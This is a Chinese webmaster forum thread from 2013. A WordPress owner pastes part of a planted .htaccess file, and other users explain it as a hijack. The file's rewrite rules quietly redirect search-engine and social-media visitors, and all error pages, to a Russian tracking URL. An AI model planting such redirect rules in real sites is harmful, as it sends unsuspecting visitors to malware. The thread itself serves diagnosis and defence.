看我某站点上的.haccess文件，这是被别人黑了吧？谢谢

roror999 · 发表于 2013-4-9 16:22:26

一个wordpress站点，

今天偶尔将二级目录打错，发现跳转到

http://pyatnickiy.ru/track.php

复制代码

纳闷，一顿搜索，发现站点根目录下的.haccess文件达27KB

打开一看，部分代码如下

<IfModule mod_rewrite.c>
- `% ` I" v e! S, ~7 `+ C5 j
RewriteEngine On 0 X+ |( O/ X0 ^! w$ B: G1 m
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
$ f" u, {; v* }, ~ G3 f7 l% X
RewriteRule ^(.*)$ http://pyatnickiy.ru/track.php [R=301,L] + ?8 y" g) S, A. L* Z# N# i3 `* v
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*) ( t# u, \* U# r& z! ]4 I' [
RewriteRule ^(.*)$ http://pyatnickiy.ru/track.php [R=301,L]
" `; Y( w0 v9 R6 j& x
</IfModule>
5 V, ?( A4 |7 y
ErrorDocument 400 http://pyatnickiy.ru/track.php
9 M* t9 }6 N! _9 U6 j3 C
ErrorDocument 401 http://pyatnickiy.ru/track.php % g" X. x4 t) \" M. a
ErrorDocument 403 http://pyatnickiy.ru/track.php ; Y0 b$ h) U9 R8 O/ r5 O: E0 @
ErrorDocument 404 http://pyatnickiy.ru/track.php
8 x0 Z6 R. J I7 d2 ^9 J) n
ErrorDocument 500 http://pyatnickiy.ru/track.php

复制代码

这是曾经被别人黑过了吧？

黑客到我站点里做了什么，对他有什么好处呢？
求助，谢了先

roror999 · 发表于 2013-4-9 16:23:22

补充，这个站点安装在hawkhost老鹰主机的空间里

满意沟通 · 发表于 2013-4-9 16:35:26

来源那些搜索引擎的流量 301到那个网站

400等那些错误也到那个网站

生鱼片 · 发表于 2013-4-9 16:52:30

网站被劫持了自己打开看不到
从GOOGLE点进来301到http://pyatnickiy.ru/track.php

roror999 · 发表于 2013-4-9 17:13:44

生鱼片发表于 2013-4-9 16:52
4 h4 N% D2 T+ `! Z" N' |2 }网站被劫持了自己打开看不到
( }" {9 A, m, Z5 D- `% q3 b- Q1 d从GOOGLE点进来301到http://pyatnickiy.ru/track.php

谢谢，果然如此，

我在google.com里site：domain.com ，点链接过去，google提示

要前往的网站包含恶意软件！
Google Chrome现已阻止访问 mampoks.ru。

dfy · 发表于 2013-4-9 17:22:02

俄罗斯的黑客。。。

浅醉 · 发表于 2013-4-9 17:34:16

最近发觉黑客活动特别频繁,让我等小白情何以堪

gger · 发表于 2013-4-9 18:21:45

一直不知道这个文件的作用

number007 · 发表于 2013-4-9 20:31:00

网站被劫持了自己打开看不到

好人 · 发表于 2013-4-9 21:51:43

number007 发表于 2013-4-9 20:31
$ c( d( F/ F* p4 n; p4 `5 u: P7 W网站被劫持了自己打开看不到

301跳转。
从上面来路的，自动跳转到他的网站。

好人 · 发表于 2013-4-9 21:56:19

roror999 发表于 2013-4-9 16:23 ' T1 ]% V: r& [" l# v/ y
补充，这个站点安装在hawkhost老鹰主机的空间里

我也是老鹰主机的。也出现过这种情况。301跳转。老鹰主机一个IP 几十个站，对方是旁注写入的。你根本就没有办法。
给ADMIN文件夹加个密吧。否则有你受的。
不知道你是不是WP程序，如果是，加个安全插件。通过这两个方法，应该可以解决这个问题。

米客小D · 发表于 2013-4-9 22:33:15

好人发表于 2013-4-9 21:56
0 r1 h7 A( Q2 M* x' E9 I( t我也是老鹰主机的。也出现过这种情况。301跳转。老鹰主机一个IP 几十个站，对方是旁注写入的。你根本就没 ...

文件夹加密怎么设置啊在哪里设置？

goyh · 发表于 2013-4-9 22:34:29

看来要注意下了，，，

roror999 · 发表于 2013-4-9 23:29:37

好人发表于 2013-4-9 21:56 1 F; h) t' t; j5 M. S2 `' w+ H
我也是老鹰主机的。也出现过这种情况。301跳转。老鹰主机一个IP 几十个站，对方是旁注写入的。你根本就没 ...

兄弟您好，用的wordpress
请问，给admin文件夹加密，怎么做呀？

谢了先

mediabuy · 发表于 2013-4-10 00:32:40

被劫持了。这些关键词从这些搜索引擎进来则跳转。

		自动登录	找回密码
密码			立即注册

谷歌+Bing+TT+MSN官方代理	⚡️按条S5代理⚡️静态⚡️独享⚡️5G	需要代理IP?⚡️Proxysites.ai⚡️	指纹浏览器，就用AdsPower
Mediabuy⚡️玩家开户首选	【鲁班跨境通-自助充值转账】	FB/GG/TT❤️官方免费开户	Affiliate 全媒体流量资源⚡️
Taboola/Outbrain /Bing⚡️一级代理	*开户投流-724h❤️人工在线**	【官方】❤️搜索套利买量投流开户	独立站⚡️开户投放
FB BM不限额，短id账单户	E.PN 虚拟卡	DuoPlus专注打造跨境电商云手机	BINOM TRACKER 60% OFF!
比Adplexity还好用的Spy工具	ADPLEXITY + ADVERTCN	7200W全球动态不重复住宅IP代理	全球虚拟卡, 支持U充值
Facebook 批量上广告	尤里改 - FB 稳定投放	免费黑五教程（持续更新、欢迎交流）	FB 三不限源头 - 自助下户充值转款
各种主页、账单户、BM户（优势）	⚡️个人户，bm户不限额，账单户	9Proxy ⚡️ $0.04/IP, 无限带宽	IPCola原生住宅IP⚡️$2.1/条双ISP
Google、Bing官方总代联盟流量开户	fb耐用号0.01一个	fb账号官方合作商	FB资源，账单户，分享户，国内一手
FB企业户BM户账单户源头	试试Mybid的顶级广告模式	Mybid让你的流量赚更多的钱	全球超2亿的动/静态纯净住宅IP
GeeLark 最强云手机+指纹浏览器	Facebook/TikTok24h免费开户服务	招exoclick/TJ等国际联盟代投运维	火云指纹浏览器⚡️10个环境免费⚡️
IPWO全球住宅代理⚡️免费测试⚡️	FB海外三不限-户源多费率低	谷歌+Bing+TT+MSN官方代理	广告位出租

[闲聊] 看我某站点上的.haccess文件，这是被别人黑了吧？谢谢

社区QQ达人